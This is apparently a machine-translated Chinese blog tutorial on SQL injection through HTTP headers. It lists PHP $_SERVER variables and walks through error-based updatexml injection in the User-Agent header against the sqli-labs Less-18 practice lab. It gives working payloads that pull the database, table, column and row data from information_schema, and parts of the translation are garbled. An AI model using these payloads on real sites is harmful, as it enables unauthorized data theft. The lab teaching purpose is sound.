当前位置:网站首页>SQL head injection -- injection principle and essence
SQL head injection -- injection principle and essence
2022-07-07 12:24:00 【hcjtn】
SQL head Inject
Let's talk about before head injection , I want to emphasize :
When there is no source code , You must try more to do penetration test .
sql Injection essence : Is to execute the data entered by the user as code
sql Two key conditions :1. The user can control the input .2. The code to be executed by the original program , Spliced user input data .
All vulnerabilities are caused by parameter transmission .
Four kinds of http The ginseng :get The ginseng ,post The ginseng ,cookie The ginseng ,head The ginseng ( Get the content in the request header ).
head Injection is usually triggered at login or submission .
One ,head Principle of injection
Use the website to provide back-end customer port information (cookie) Or by head Get the information of our client ( Such as ip etc. ), This information should be stored in the database , So here we have it sql Inject .
After observing the source code , We find that we need head Injection situation , There is one more in the core source code php sentence :
$uagent = $_SERVER['HTTP_REFERER']; // Currently requested Host: The content of the head .
We can also learn about SERVER Other functions of :
_SERVER[‘HTTP_ACCEPT_LANGUAGE’]// Browser language
$_SERVER[‘REMOTE_ADDR’] // The current user IP .
$_SERVER[‘REMOTE_HOST’] // Current user host name
S E R V E R [ ′ R E Q U E S T U R I ′ ] / / U R L _SERVER['REQUEST_URI'] //URL SERVER[′REQUESTURI′]//URL_SERVER[‘REMOTE_PORT’] // port .
$_SERVER[‘SERVER_NAME’] // The name of the server host .
$_SERVER[‘PHP_SELF’]// File name of executing script
$_SERVER[‘argv’] // Parameters passed to the script .
$_SERVER[‘argc’] // The number of command line arguments passed to the program .
$_SERVER[‘GATEWAY_INTERFACE’]//CGI Version of the specification .
$_SERVER[‘SERVER_SOFTWARE’] // The string of the server identity
$_SERVER[‘SERVER_PROTOCOL’] // The name and version of the communication protocol when requesting the page
$_SERVER[‘REQUEST_METHOD’]// Request method when accessing page
$_SERVER[‘QUERY_STRING’] // Inquire about (query) String .
$_SERVER[‘DOCUMENT_ROOT’] // The root directory of the document where the script is currently running
$_SERVER[‘HTTP_ACCEPT’] // Currently requested Accept: The content of the head .
$_SERVER[‘HTTP_ACCEPT_CHARSET’] // Currently requested Accept-Charset: The content of the head .
$_SERVER[‘HTTP_ACCEPT_ENCODING’] // Currently requested Accept-Encoding: The content of the head
$_SERVER[‘HTTP_CONNECTION’] // Currently requested Connection: The content of the head . for example :“Keep-Alive”.
$_SERVER[‘HTTP_HOST’] // Currently requested Host: The content of the head .
$_SERVER[‘HTTP_REFERER’] // Link to the... Of the previous page of the current page URL Address .
$_SERVER[‘HTTP_USER_AGENT’] // Currently requested User_Agent: The content of the head .
$_SERVER[‘HTTPS’]// If you pass https visit , Is set to a non empty value (on), Otherwise return to off
$_SERVER[‘SCRIPT_FILENAME’] # The absolute pathname of the currently executing script .
$_SERVER[‘SERVER_ADMIN’] # Administrator information
$_SERVER[‘SERVER_PORT’] # The port used by the server
$_SERVER[‘SERVER_SIGNATURE’] # String containing server version and virtual host name .
$_SERVER[‘PATH_TRANSLATED’] # The file system of the current script ( Not the document root ) Basic path .
$_SERVER[‘SCRIPT_NAME’] # Contains the path of the current script . This is useful when the page needs to point to itself .
$_SERVER[‘PHP_AUTH_USER’] # When PHP Running on the Apache Module mode , And is using HTTP Authentication function , This variable is the user name entered by the user .
$_SERVER[‘PHP_AUTH_PW’] # When PHP Running on the Apache Module mode , And is using HTTP Authentication function , This variable is the password entered by the user .
$_SERVER[‘AUTH_TYPE’] # When PHP Running on the Apache Module mode , And is using HTTP Authentication function , This variable is the type of Authentication ------- Extract website :$_SERVER Detailed explanation - Brother brush - Blog Garden (cnblogs.com)
Two , Common functions :
Because in head At the time of Injection , There is no echo , So we can use blind injection or ** Report errors ( recommend )** The technique .
3、 ... and , Operation process :
This is mainly about updatexml methods ( With sql_lab less-18 For example ):
First use burp suit Carry out a packet capture , After catching the bag :
stay User-Agent: Perform an error injection .
First, query the database name :
'and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) – q
Table name judgment :'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1),1,1) – q
Judge the listing :'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1),1,1)-- q
Judgment data :'and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1),1,1)-- q
边栏推荐
- Inverted index of ES underlying principle
- Problem: the string and characters are typed successively, and the results conflict
- HCIA复习整理
- How to understand the clothing industry chain and supply chain
- 人大金仓受邀参加《航天七〇六“我与航天电脑有约”全国合作伙伴大会》
- idea 2021中文乱码
- NGUI-UILabel
- Epp+dis learning road (2) -- blink! twinkle!
- Niuke website
- 防红域名生成的3种方法介绍
猜你喜欢
跨域问题解决方案
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
Superscalar processor design yaoyongbin Chapter 10 instruction submission excerpt
Flet教程之 18 Divider 分隔符组件 基础入门(教程含源码)
2022 8th "certification Cup" China University risk management and control ability challenge
Zero shot, one shot and few shot
Time bomb inside the software: 0-day log4shell is just the tip of the iceberg
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
zero-shot, one-shot和few-shot
百度数字人度晓晓在线回应网友喊话 应战上海高考英语作文
随机推荐
数据库系统原理与应用教程(010)—— 概念模型与数据模型练习题
@Bean与@Component用在同一个类上,会怎么样?
When OSPF specifies that the connection type is P2P, it enables devices on both ends that are not in the same subnet to Ping each other
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
跨域问题解决方案
[neural network] convolutional neural network CNN [including Matlab source code 1932]
如何理解服装产业链及供应链
Tutorial on principles and applications of database system (007) -- related concepts of database
什么是局域网域名?如何解析?
Flet教程之 15 GridView 基础入门(教程含源码)
TypeScript 接口继承
Apache installation problem: configure: error: APR not found Please read the documentation
【数据聚类】基于多元宇宙优化DBSCAN实现数据聚类分析附matlab代码
Simple network configuration for equipment management
111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]
Sort out the garbage collection of JVM, and don't involve high-quality things such as performance tuning for the time being
人大金仓受邀参加《航天七〇六“我与航天电脑有约”全国合作伙伴大会》
小红书微服务框架及治理等云原生业务架构演进案例
[filter tracking] strapdown inertial navigation pure inertial navigation solution matlab implementation
数据库系统原理与应用教程(009)—— 概念模型与数据模型